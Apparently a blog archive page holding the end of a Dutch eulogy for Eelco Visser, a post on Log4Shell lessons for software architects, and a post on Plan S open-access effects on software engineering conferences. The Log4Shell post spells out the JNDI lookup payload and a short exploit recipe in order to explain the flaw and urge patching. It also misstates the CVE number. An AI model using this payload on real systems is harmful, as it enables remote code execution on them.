Deze korte geschiedenis laat ook iets zien over de internationale dimensie van Eelco’s werk. Hij was zeer actief, en geliefd, binnen internationale organisaties zoals IFIP en ACM SIGPLAN. Het lukte hem om het top-congres SPLASH voor het eerst naar Europa te halen.

En natuurlijk had Eelco een visie hoe het beter kon: Al die congressen die hun web site in elkaar liepen te knutselen: dat moest efficiënter kunnen. En dus, in lijn met zijn systeem-filosofie, ontwierp hij het CONF systeem dat nu al tien jaar in de lucht is. En wist hij honderden congressen te overtuigen zijn systeem, tegen betaling, te gebruiken.

Ook op het gebied van onderwijs had Eelco een visie, en wist hij die te realiseren. Programmeeronderwijs moest beter, vond hij, en dus ontwierp hij een systeem, WebLab, dat nu ook al bijna 10 jaar in de lucht is. En ook hier wist hij talloze docenten te overtuigen zijn systeem te gebruiken.

Daarnaast had Eelco een goed doordachte mening over welke vakken in een opleiding informatica thuis horen. Toen wij ons curriculum moesten herzien, was Eelco de perfecte kandidaat om de bijbehorende commissie voor te zitten. Eelco deed dit met verve, rustig en vasthoudend, redenerend vanuit onderwijskundige principes om geschillen te beslechten. Het resultaat staat als een huis.

Voor Eelco’s onderwijs geldt wat Willem-Paul Brinkman in het online condoleance register schreef: “Zonder het misschien te beseffen, zullen vele generaties Delftse studenten profiteren van zijn onderwijsinnovaties.”

Eelco was trots op zijn “Programming Languages Group“. Hij heeft die uit het niets opgebouwd tot een internationale topgroep. Hij zorgde goed voor zijn mensen, en streed voor de beste apparatuur en werkplekken. Als lid van het management team van de afdeling, zette hij zich in voor informatica in de volle breedte, op facultair en universitair niveau. Ook landelijk was hij actief, onder meer in de Nederlandse Vereniging voor Software Engineering VERSEN.

En hoe kreeg Eelco dit allemaal voor elkaar? Wat was zijn geheim?

Misschien vond Eelco (een beetje) weerstand eigenlijk wel leuk. Hij was niet bang tegengas te geven: hij had tenslotte goed nagedacht over zijn mening. En hij vond het prima tegenstand te krijgen: dat was een teken dat hij goed op weg was de status quo te doorbreken.

Misschien vond niet iedereen dit altijd even makkelijk. Maar Eelco was ook heel vriendelijk, en zeker bereid van mening te veranderen.

En, Eelco was ook geduldig: Grootse veranderingen kosten tijd. Als hij zag dat hij onvoldoende medestanders had kon hij wachten. Of, onder de radar, alvast klein beginnen om zijn eigen plannen toch in gang te zetten.

Wat zullen we Eelco missen in Delft. Het visionaire, het dwarse, de focus op de inhoud, de liefde voor het vak, de vasthoudendheid, en de aandacht voor student en collega: juist dat hebben we nodig in Delft.

Ik wil afsluiten met een paar woorden naar aanleiding van Corona en de lockdown. De afgelopen twee jaar hadden Eelco en ik wekelijks contact, vooral binnen het management team van de afdeling, maar ook vaak 1-op-1, allemaal online, vanuit huis. We bespraken het reilen en zeilen van de afdeling, en de impact van Corona. Over één ding waren we het eens: Meer thuis zijn, meer zien van je kinderen, meer doen met het gezin: dit hebben we allebei als een geschenk ervaren.

Door de lockdown weet ik niet wanneer ik Eelco voor het laatst echt gezien heb. Ik denk dat het 14 oktober was, bij de promotie van Arjen Rouvoet. Dat was een mooie dag, en zo herinner ik me Eelco graag: Wetenschap van het hoogste niveau, internationale collega’s in inhoudelijk debat, een cum laude promotie, en Eelco gelukkig, stralend temidden van zijn PL groep.

Lieve familie, vrienden, collega’s, allemaal: We zullen Eelco zéér missen. Iedereen van ons heeft zijn of haar eigen, prachtige herinneringen aan Eelco. Vandaag is een dag om daaraan vast te houden, en om die herinneringen met elkaar te delen.

Ik wens u allen, en in het bijzonder de familie, alle sterkte toe.

14Dec2021

Log4Shell: Lessons Learned for Software Architects

Posted in Development by Arie van Deursen

This week, the log4shell vulnerability in the Apache log4j library was discovered (CVE-2021-4428). Exploiting this vulnerability is extremely simple, and log4j is used in many, many software systems that are critical to society — a lethal combination. What are the key lessons you as a software architects can draw from this?

The vulnerability

In versions 2.0-2.14.1, the log4j library would take special action when logging messages containing "${jndi:ldap://LDAP-SERVER/a}": it would lookup a Java class on the LDAP server mentioned, and execute that class.

This should of course never have been a feature, as it is almost the definition of a remote code execution vulnerability. Consequently, the steps to exploit a target system are alarmingly simple:

Create a nasty class that you would like to execute on your target;
Set up your own LDAP server somewhere that can serve your nasty class;
"Attack" your target by feeding it strings of the form "${jndi:ldap://LDAP-SERVER/a}" where ever possible — in web forms, search forms, HTTP requests, etc. If you’re lucky, some of this user input is logged, and just like that your nasty class gets executed.

Interestingly, this recipe can also be used to make a running instance of a system immune to such attacks, in an approach dubbed logout4shell: If your nasty class actually wants to be friendly, it can programmatically disable remote JNDI execution, thus safeguarding the system to any new attacks (until the system is re-started).

The source code for logout4shell is available on GitHub: it also serves as an illustration of how extremely simple any attack will be.

Under attack

As long as your system is vulnerable, you should assume you or your customers are under attack:

Depending on the type of information stored or services provided, (foreign) nation states may use the opportunity to collect as much (confidential) information as possible, or infect the system so that it can be accessed later;
Ransomware "entrepreneurs" are delighted by the log4shell opportunity. No doubt their investments in an infrastructure to scan systems for this vulnerability and ensure future access to these systems will pay off.
Insiders, intrigued by the simplicity of the exploit, may be tempted to explore systems beyond their access levels.

All this calls for a system setup according to the highest security standards: deployments that are isolated as much as possible, access logs, and the ability to detect unwarranted changes (infections) to deployed systems.

Applying the Fix

Naturally, the new release of log4j, version 2.15, contains a fix. Thus, the direct solution for affected systems is to simply upgrade the log4j dependency to 2.15, and re-deploy the safe system as soon as possible.

This may be more involved in some cases, due to backward incompatibilities that may have been introduced. For example, in version 2.13 support for Java 7 was stopped. So if you’re still on Java 7, just upgrading log4j is not as simple (and you may have other security problems than just log4shell). If you’re still stuck with log4j 1.x (end-of-life since 2015), then log4shell isn’t a problem, but you have other security problems instead.

Furthermore, log4j is widely used in other libraries you may depend on, such as Apache Flink, Apache SOLR, neo4j, Elastic Search, or Apache Struts: See the list of over 150 affected systems. Upgrading such systems may be more involved, for example if you’re a few versions behind or if you’re stuck with Java 7. Earlier, I described how upgrading a system using Struts, Srping, and Hibernate took over two weeks of work.

All this serves as a reminder of the importance of dependency hygiene: the need to ensure dependencies are at their latest versions at all times. Upgrading versions can be painful in case of backward incompatibilities. This pain should be swallowed as early as possible, and not postponed until the moment an urgent security upgrade is needed.

Deploying the Fix

Deploying the fix yourself should be simple, and with an adequate continuous deployment infrastructure a simple push of a button or reaction to a commit.

If your customers need to install an upgraded version of your system themselves, things may be harder. Here investements in a smooth update process pay off, as well a disciplined versioning approach that encourages customers to update their system regularly, without as little incompatibility roadblocks as possible.

If your system is a library, you’re probably using semantic versioning. Ideally, the upgrade’s only change is the upgrade of log4j, meaning your release can simply increment the patch version identifier. If necessary, you can consider backporting the patch to earlier major releases.

Your Open Source Stack

As illustrated by log4shell, most modern software stacks critically depend on open source libraries. If you benefit from open source, it imperative that you donate back. This can be in kind, by freeing your own developers to contribute to open source. A simpler approach may be to donate money, for example to the Apache Software Foundation. This can also buy you influence, to make sure the open source libraries develop the features you want, or conduct the security audits that you hope for.

The Role of the Architect

As a software architect your key role is not to react to an event like log4shell. Instead, it is to design a system that minimizes the likelihood and impact such an event would have on confidentiality, integrity and availability of that system.

This requires investments in:

Maintainability: Enforcing dependency hygiene, keeping dependencies current at all times, to minimize mean time to repair and maximize availability
Deployment security: Isolating components where possible and logging access, to safeguard confidentiality and integrity;
Upgradability: Ensure that those who have installed your system or who use your library can seamlessly upgrade to (security) patches;
The open source eco-system: sponsoring the development of open source components you depend on, and contributing to their security practices.

To make this happen, you must guide the work of multiple people, including developers, customer care, operations engineers, and the security officer, and secure sufficient resources (including time and money) for them. Most importantly, this requires that as an architect you must be an effective communicator at multiple levels, from developer to CEO, from engine room to penthouse.

20Aug2019

Europe’s Open Access “Plan S” and Paper Publishing in Software Engineering Research

Posted in Society by Arie van Deursen

A year ago, more than a dozen influential research funders in Europe launched Plan S. This plan poses, from 2021 onwards, strict requirements on open access publishing of any research funded through the Plan S coalition. To understand what this means for my field of research, software engineering, I did some data collection. My data suggests that 14% (one out of seven) of the published papers are affected, meaning that conferences may lose 14% of their papers, unless publishers take action.

Plan S in a Nutshell

Plan S is an initiative launched by:

The European Union, which runs the Horizon Europe program of €100 billion (over 113 billion US dollars). It is the successor to H2020, and includes funding for the prestigious personal grants of the European Research Council (ERC).
Twelve national research funding organizations, from various European countries, such as The Netherlands (where I live), the United Kingdom, and Austria.

The aim of these Plan S “funders” (collectively called “Coalition S”), is that

With effect from 2021, all scholarly publications on the results from research funded by public or private grants provided by national, regional and international research councils and funding bodies, must be published in Open Access Journals, on Open Access Platforms, or made immediately available through Open Access Repositories without embargo.

The coalition has taken an axiomatic approach to expressing its plans, starting with 10 principles, followed by a Guidance to the Implementation. The results is a somewhat hard to understand document, in which there are multiple ways to become Plan S compliant.

In all forms of Plan S compliance the Creative Commons license plays a key role. As Plan S (under the header Rights and Licensing) puts it:

The public must be granted a worldwide, royalty-free, non-exclusive, irrevocable license to share (i.e., copy and redistribute the material in any medium or format) and adapt (i.e., remix, transform, and build upon the material) the article for any purpose, including commercial, provided proper attribution is given to the author.

This, thus, corresponds to the Creative Commons Attribution license, also known as CC BY. Note that this is a very generous license, essentially allowing anyone to do anything with the paper. Traditionally, publishers do not like this, as they wish to keep exclusive control over who distributes the paper.

Strictly speaking, Plan S does not require CC BY per se, but authors need to ask permission for any other license. For the CC BY-SA “Share-Alike” variant of the license permission will be granted automatically, but for CC BY-ND “No Derivatives” permission needs to be asked. Coalition S explicitly indicates that CC BY-NC “Non-Commercial” is not allowed:

We will not accept a Non-Commercial restriction on the re-use of research results.

Given this CC BY starting point, Plan S distinguishes three routes to compliance:

Open access venues: The conference or journal is gold open access, meaning all papers in it are freely available. This is “the ideal” case, from Plan S perspective, and compliant. Open access fees (“Article Processing Charges”) are common in this route, and will be refunded by Coalition S.
Subscription-based venues: These by themselves are non-compliant, but can be made compliant if the author immediately (no embargo) deposits the Author’s Accepted Manuscript (AAM) in a compliant repository with a CC BY license. This license is a complicating factor, since many publishers pose restrictions on redistribution of self-archived papers (they are self-archived, and no one else can do this — which is at odds with the sharing principle of CC BY). If such restrictions exist, a way out can exist if the venue permits hybrid open access, in which authors can pay an extra fee to make their own article open access available with a CC BY license. This model is offered by many publishers, but not by all. Note, however, that in Plan S, while this route is “compliant”, Plan S does not refund the APC fees.
Subscrition venues in transition: If the conference or journal is not open access yet, but in transition towards a full open access model by 2024, the publisher and Plan S can agree on “transformative arrangements”. In this case the paper will be compliant, and if there are fees involved they will (likely) be covered.

The 10 principles also address other issues relevant to open access: it requires that “the structure of fees must be transparent” (principle 05, suggesting that some of the current article processing charges are unexplainably high), and warns that the funders will monitor compliance and sanction non-compliant beneficiaries/grantees (principle 09, a direct threat to me).

Plan S should start in 2021, although publishers can earn some extra time by participating in the above-mentioned “transformative arrangements”.

Plan S Compliance in Software Engineering Research

To understand whether Plan S compliant publishing in my area of research, software engineering, is possible at the moment, I looked at the top 20 venues in the area of Software Systems, according to Google Metrics.

In these top 20 venues, just three are gold open access: POPL and OOPSLA, both published by ACM SIGPLAN, and ETAPS TACAS, published by Springer. It is in these venues that authors funded through Coalition S, can safely publish, following the gold open access route to compliance. Their open access fees will be covered by the Coalition S funders.

The remaining 17 are closed access subscription venues, published by ACM, IEEE, Elsevier and Springer. Authors who wish to publish there, and who need to be compliant with Plan S, would then have to resort to the self-archiving route.

Since the self-archiving constraints of these four publishers do not permit the use of CC BY without a fee, the hybrid route applies, in which (1) authors pay a fee; (2) the publisher distributes with CC BY; and (3) the author shares on a Plan S compliant repository. Note that this route is compliant, but that the fee is not refunded by Coalition S.

This self-archiving route works for IEEE journals, but not for IEEE conferences. This is because for IEEE conferences presently authors do not have the option to pay a fee to publish just their own paper open access (unlike ACM). As stated by IEEE in their FAQ on the “IEEE Policy Regarding Authors Rights to Post Accepted Versions of Their Articles”:

Currently IEEE does not have an Open Access program for conference articles.

In other words: Conferences published by IEEE are not Plan S compliant, not even with the green open access route (as IEEE does not permit CC BY).

Of the 20 venues, IEEE is the sole publisher of two conferences (ICSME and SANER), one magazine (IEEE Software), and the co-publisher of another three (ICSE, SANER, MSR) which are published alternatingly by IEEE or ACM.

In summary, of the 20 top venues:

Three are compliant through gold open access.
Eleven are compliant through a fee-based hybrid model with CC BY.
Three are half of the time compliant through a fee-based hybrid model with CC BY, the other half non-compliant.
Three can presently not be made compliant.

Note that other fields may fare better: top conferences in security (Usenix), AI (AAAI, NIPS), or OOPSLA/POPL/ICFP sponsored by SIGPLAN are all full gold open access. This, however, seems the exception rather than the rule.

Plan S Rationale

With Plan S requiring many publishers to change their policies, one may wonder what the rationale behind this plan is. The way I see it, the key reason for the European funders to propose this plan is leverage, in the following ways:

The European Union as a whole will benefit more from their €100 billion investment, if any (European) citizen can freely access the resulting knowledge;
Research is never conducted in isolation. Progress in research is not just visible in papers directly funded through a project, but also in subsequent papers building on top of those results (refuting, strengthening, criticizing, or expanding them). The more venues are open access, the higher the chance that these follow up results are also published as open access.
The universities in the European Union together will benefit financially if the publishing market shifts towards open access: The current profit margins of up to 40% of publishing giants like Elsevier are a waste of tax payer money that instead should be directly invested in research and education, the exact same causes that the EU and its Horizon Europe program seeks to advance as well. Pumping €100 billion into a system that wastes money at scale is ineffective.

Furthermore, note that this coalition works in all areas of research, including climate change, health care, and artificial intelligence. From the European perspective, the world needs informed societal debate about these topics. To that end, the EU is committed to maximizing the free availability of any research it is funding.

Last but not least, Coalition S is working hard to expand the list of funders, talking to both China and India, for example. Also, Jordania and Zambia have already joined, as well as the Bill and Melinda Gates Foundation (though their presence in computer science research is limited, compared to, e.g., China).

Impact on Software Engineering Conferences

With software engineering venues so clearly affected by Plan S, the next question is how many papers will be affected. Thus, I decided to collect some data, to measure the impact of Plan S in my field.

Since conferences (with full length rigorously reviewed papers) are dominant in software engineering, I focused on these. I picked two editions of ICSE and ESEC/FSE (for which I am a member of the steering committee) and for the smaller and more specialized ISSTA conference (which I happened to attend this summer).

For each published paper, I manually checked the acknowledgments to see whether the authors were beneficiaries from any of the Plan S funders. I did this for the main (technical research) track papers only, and not for, e.g., demonstration sub-tracks.

The results (also available as spreadsheet) are as follows:

A few results stand out:

Overall, 14% (1 in 7) of the papers currently receive grants from Coalition S.
The two big conferences, ICSE (over 1000 participants) and ESEC/FSE (over 300 participants), exhibit an impact on around 11-12% of the papers.
For the smaller ISSTA conference, more than 25% of the papers are (co-)funded through Coalition S. This number reflects the composition of the community, and the impact is enlarged by the small total number of papers. Should the affected researchers decide not to submit to ISSTA anymore, this may constitute an existential threat to the conference.
The EU is by far the biggest funder, with researchers and industry from many countries benefiting from participation in large EU projects. Furthermore, the EU ERC (Advanced) Grants are extremely prestigious (€2.5 million) and have been won by leaders in the software engineering field such as (in the collected data) Carlo Ghezzi, Mark Harman, Bashar Nuseibeh, and Andreas Zeller.
The UK is the second biggest funder, mostly through its EPSRC program. This is the UK’s national program, unrelated to the European Union. Thus, EPSRC’s participation in Coalition S will not be affected by Brexit (apart from increased financial pressure on ESPRC’s overall budget as the UK’s economy is shrinking).
While a small country with limited funds, Luxembourg is very active in the area of software engineering, causing high impact for, e.g., the ISSTA conference.

The 14% I found is substantially higher than the estimate of 6% impact found by Clarivate Analytics (cited by the ACM), and the 5% found by the ACM itself. If anything, this factor 3 or even factor 5 with ISSTA difference calls for a detailed assessment for each venue affected.

My data is based on what I saw in the acknowledgments: In reality it is likely that more papers are affected. You can check your own papers in my on line spreadsheet — corrections are welcome.

Collecting the data takes took me around a minute per paper. You are cordially invited to repeat this exercise for your own favorite conference or journal (TSE, EMSE, JSS, MSR, ICSME, RE, MODELS, …), and I will do my best to reflect your data in this post. If you’re a conference organizer, the safest thing to do is survey authors about their funding, enquiring about Coalition S based funding explicitly.

There is a another point to be made that required little data gathering.

The 14% figure relates to impact on the conference. Individual researchers can be affected much more. Our group at TU Delft, for example, has been very successful in attracting substantial funding both from the EU and from the Dutch NWO. As a consequence, for me personally, half of my publications will be affected. For some new PhD students starting in my group funded on such projects all publications will be affected.

A Call for Action

Clearly, the impact of Plan S can be substantial, on individual researchers as well as on conferences and journals.

This calls for action.

ACM, as one of the leading publishers in computer science, shared an update on their Plan S progress in their July 2019 news letter. It states:

It is worth noting that ACM has been working with various consortia in the US, Europe, and elsewhere on a framework for transitioning the traditional ACM Digital Library licensing (subscription) model to a Gold Open Access model utilizing an innovative “transformative agreement” model. More details will be announced later in 2019 as the first of these Agreements are executed; once these are in place, all ACM Publications will comply with the majority of Plan S requirements.

This is good news, and certainly not a simple undertaking. I sincerely hope that ACM will be able to meet not just the majority, but all requirements, and for all conferences and journals. This essentially implies a change of business model for the ACM Digital Library, from a subscription based to an author-(institution)-pays model. This in itself will not be easy, and is further complicated by several constraints and strong criteria imposed by Plan S, for example concerning cost transparency. The key challenge will be to convince Coalition S that these criteria are indeed met.

The ACM Special Interest Group on Programming Languages, SIGPLAN, meanwhile, sets an example on how to progress within the current setting. The research papers of three of its key conferences are published as part of the Proceedings of the ACM in Programming Languages. This is a Gold Open Access journal in which different volumes are devoted to different conferences. The POPL, OOPSLA, and ICFP conferences have adopted this model, and hence are fully open access. To quote the Inaugural Editorial Message by Philip Wadler:

PACMPL is a Gold Open Access journal. It will be archived in ACM’s Digital Library, but no membership or fee is required for access. Gold Open Access has been made possible by generous funding through ACM SIGPLAN, which will cover all open access costs in the event authors cannot. Authors who can cover the costs may do so by paying an Article Processing Charge (APC). PACMPL, SIGPLAN, and ACM Headquarters are committed to exploring routes to making Gold Open Access publication both affordable and sustainable.

The ACM SIG for Software Engineering, SIGSOFT, so far has not taken action along these lines. Nevertheless, this is simple to do, especially since SIGPLAN has laid out all the ground work.

Furthermore, last year, we as ACM SIGSOFT members elected Tom Zimmermann as our chair. In his statement for the elections he wrote:

We should make gold open access a priority for SIGSOFT

He also provided details on how to achieve this, mostly along the lines of SIGPLAN. By electing him, we as ACM SIGSOFT members gave him the mandate to carry this out. This will not be easy to do, but calls for all support from the full software engineering research community to help the ACM SIGSOFT leadership with this important mission.

The other main non-profit society publisher in software engineering is the IEEE. IEEE publishes various conferences and journals in software engineering on its own, such as ICSME, MODELS, RE and ICST. Furthermore, several major conferences are co-sponsored by IEEE and ACM together, such as ICSE and ASE.

Unfortunately, I have not been able to find on line information about IEEE’s vision on Plan S, and its impact on the conference proceedings published by the IEEE. This makes it very unclear what, from 2021 onwards, the publication options are for many software engineering conferences.

Nevertheless, it is my hope that IEEE will embrace Plan S, and move to open access conference proceedings, as many other society publishers have done.

This, then, will open the floor to joint open access publications, for example through the new fully open access “Proceedings of the ACM in Software Engineering”.

Version History

Version 0.4, 20-08-2019. First public version.
Version 0.5, 25-08-2019. Major update to reflect that self-archiving route can aslo be used to meet Plan S requirements.
Version 0.6, 26-08-2019. Small updates about CC BY options.
Version 0.7, 28-08-2019. Major update about repository route in combination with CC BY and hybrid open access, and transformative arrangements.
Version 0.8, 30-08-2019. Add links to IEEE open access faq/
Version 0.9, 04-09-2019. Small typos fixed

Note: IANAL — use this information at your own risk.

Acknowledgements: Thanks to Diomidis Spinellis, Simon Bains, Jeroen Bosman, Bianca Kramer, and Jeroen Sondervan for feedback on an earlier drafts on this post.

Arie van Deursen

Software engineering in theory and practice

Author Archives: Arie van Deursen

Migrating Legacy Like a North Star Engineer

Mahsa Jina Amini and Anne Frank: Woman, Life, Freedom

Member Advisory Council IT Assessment

Lid Adviescollege ICT-toetsing

TU Delft Computer Science Research Assessment 2015-2020

Self-Assessment Summary

Eelco Visser (1966-2022)

Eelco Visser (1966-2022)

Log4Shell: Lessons Learned for Software Architects

The vulnerability

Under attack

Applying the Fix

Deploying the Fix

Your Open Source Stack

The Role of the Architect

Europe’s Open Access “Plan S” and Paper Publishing in Software Engineering Research

Plan S in a Nutshell

Plan S Compliance in Software Engineering Research

Plan S Rationale

Impact on Software Engineering Conferences

A Call for Action

Version History

Slide Deck